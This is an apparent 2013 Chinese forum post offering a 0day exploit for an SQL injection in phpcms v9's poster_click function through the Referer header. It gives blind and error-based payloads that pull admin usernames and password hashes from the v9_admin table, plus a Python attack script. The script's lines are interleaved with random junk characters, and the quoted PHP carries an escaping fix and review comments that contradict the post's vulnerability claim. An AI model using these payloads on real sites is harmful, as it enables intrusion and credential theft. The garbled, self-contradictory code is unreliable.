
phpcms post_click注入0day利用代码

发表于 2013-1-11 21:01:00
有人放出了 phpcms v9 的 0day,就随手写了个利用代码,其中注入代码有两种形式:

问题函数:\phpcms\modules\poster\index.php

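/**
 * Record one click on a poster and redirect the visitor to its link.
 *
 * Reads the poster id (and optionally siteid and url) from the query string,
 * stores a click record, increments the poster's click counter and ends by
 * sending a Location header.
 *
 * @return bool|void false when no poster row matches the id; otherwise the
 *                   method finishes by emitting the redirect header.
 */
public function poster_click() {
    $id = isset($_GET['id']) ? intval($_GET['id']) : 0;
    $r = $this->db->get_one(array('id'=>$id));
    if (!is_array($r) && empty($r)) return false;
    $ip_area = pc_base::load_sys_class('ip_area');
    $ip = ip();
    $area = $ip_area->get($ip);
    $username = param::get_cookie('username') ? param::get_cookie('username') : '';
    if($id) {
        $siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
        // The Referer request header is client-controlled and used to reach the
        // INSERT unescaped — that is the SQL injection demonstrated on this page
        // (a quote in the header breaks out of the string literal). Escape quote
        // and backslash characters before the value reaches the query builder.
        $referer = addslashes(HTTP_REFERER);
        // NOTE(review): $username (from a cookie) and $area (ip lookup result)
        // are stored by the same INSERT; confirm the framework escapes them
        // before they get here rather than assuming it.
        $this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>$referer, 'clicktime'=>SYS_TIME, 'type'=> 1));
    }
    $this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
    $setting = string2array($r['setting']);
    if (count($setting)==1) {
        $url = $setting['1']['linkurl'];
    } else {
        // NOTE(review): when more than one link is configured, any ?url= value
        // is accepted verbatim as the redirect target (open redirect). Limiting
        // it to the linkurl values stored in $setting would close that.
        $url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
    }
    header('Location: '.$url);
}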
利用方式:

1、可以采用盲注入的手法:
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#5 y% k5 W2 d" e) t  p+ o9 Q7 n
通过返回页面正常与否,一个个猜解密码字段。

2、代码是花开写的,随手附上了:
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
此方法是报错注入手法,原理自查。

利用程序:
% R$ M& U0 b+ k/ I" t0 D9 J' \! a: y#!/usr/bin/env python
; t/ j; Z# |8 w$ ]/ |import httplib,sys,re
6 H3 n1 j, v' c# D
# Driver for the error-based variant shown in section 2: one GET to
# poster_click with the SQL payload placed in the Referer header, then a
# regex over the response body for MySQL's "Duplicate entry" message, which
# carries the concatenated username/password/encrypt columns.
# argv[1] is the host handed to HTTPConnection, argv[2] the path prefix
# under which index.php lives (see the usage lines in the main block).
5 q6 O! N& n( L" Z5 H5 D# Q7 _# Edef attack():/ O: _8 g" {6 g. U4 i0 n
print “Code by Pax.Mac Team conqu3r!”. i- u  e5 a* d3 [. u
print “Welcome to our zone!!!”/ N+ c  H* P8 l# o: n/ U# S9 r  X* b
url=sys.argv[1]! v- f5 u) L% B- o
paths=sys.argv[2]* U0 e4 w6 e* e
conn = httplib.HTTPConnection(url)# _# ~: x: b3 f; p
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
( N: E$ F3 ?8 g2 Z; m“Accept”: “text/plain”,7 l+ p3 F5 t( F; a
# Detection note: a Referer value that is not a URL at all (quote characters,
# SELECT / concat / information_schema) is the signal to alert on in web-server
# or WAF logs for this request path.
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}4 f& s; U+ [9 H. G& n6 l9 c  u
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
9 z" l& \. y6 P+ wr1 = conn.getresponse()
- Y; f6 m8 O0 Y. s  Bdatas=r1.read()
# The leaked columns are read back out of the database error text that the
# vulnerable handler echoes to the client.
. |: P1 v0 [) p+ b3 p3 O: r: bdatas=re.findall(r”Duplicate entry \’\w+’”, datas)1 Q& L: n" v, Y, j
print datas[0]
) T9 O+ D8 S# G" I4 C1 j# jconn.close()! V3 N  b. E1 L1 b. V: t
# Entry point: requires two positional arguments, the host and the path prefix
# (the usage lines below show the expected form), otherwise prints usage and
# exits with status 1.
if __name__==”__main__”:$ S; Y- B+ x$ X5 [& K3 ]
if len(sys.argv)<3:
3 w4 ]4 |3 C. ~# b7 iprint “Code by Pax.Mac Team conqu3r”0 ?' f+ s7 d* P0 w* d+ {3 ~
print “Usgae:”3 a5 C+ x# k# u% ~8 y7 v/ c
print “    phpcmsattack.py   www.paxmac.org /”! a  z: l- n( W" a
print “    phpcmsataack.py   www.paxmac.org /phpcmsv9/”0 s4 I0 G. Q3 Z
sys.exit(1)4 m+ C# W; G  c, K8 i3 O( Q
attack()8 L$ j4 y+ P' e) E
. p4 Q* ]1 @% b3 F